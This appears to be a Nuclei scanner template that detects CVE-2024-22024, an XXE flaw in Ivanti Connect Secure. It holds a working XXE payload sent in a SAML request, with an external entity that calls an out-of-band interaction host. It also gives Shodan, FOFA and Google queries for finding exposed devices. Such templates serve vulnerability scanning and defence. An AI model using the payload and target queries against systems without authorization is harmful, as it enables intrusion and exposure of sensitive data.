55 lines
1.8 KiB
YAML
55 lines
1.8 KiB
YAML
id: CVE-2024-22024
|
|
|
|
info:
|
|
name: Ivanti Connect Secure - XXE
|
|
author: watchTowr
|
|
severity: high
|
|
description: |
|
|
Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
|
|
reference:
|
|
- https://labs.watchtowr.com/are-we-now-part-of-ivanti/
|
|
- https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
|
|
metadata:
|
|
max-request: 1
|
|
vendor: ivanti
|
|
product: connect_secure
|
|
shodan-query:
|
|
- "html:\"welcome.cgi?p=logo\""
|
|
- http.title:"ivanti connect secure"
|
|
- http.html:"welcome.cgi?p=logo"
|
|
fofa-query:
|
|
- body="welcome.cgi?p=logo"
|
|
- title="ivanti connect secure"
|
|
google-query: intitle:"ivanti connect secure"
|
|
tags: cve,cve2024,xxe,ivanti
|
|
variables:
|
|
payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
|
|
"http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
SAMLRequest={{base64(payload)}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '/dana-na/'
|
|
- 'WriteCSS'
|
|
condition: and
|
|
# digest: 490a00463044022064dfea002db32f325d2a6eb8b2611463d76db7ac1f5dfd008ad98fc469f8af9102202351431f37385f4819eda1fc126a5f723e1c525b7a99a88c5628f5f0a53e45a9:922c64590222798bb761d5b6d8e72950 |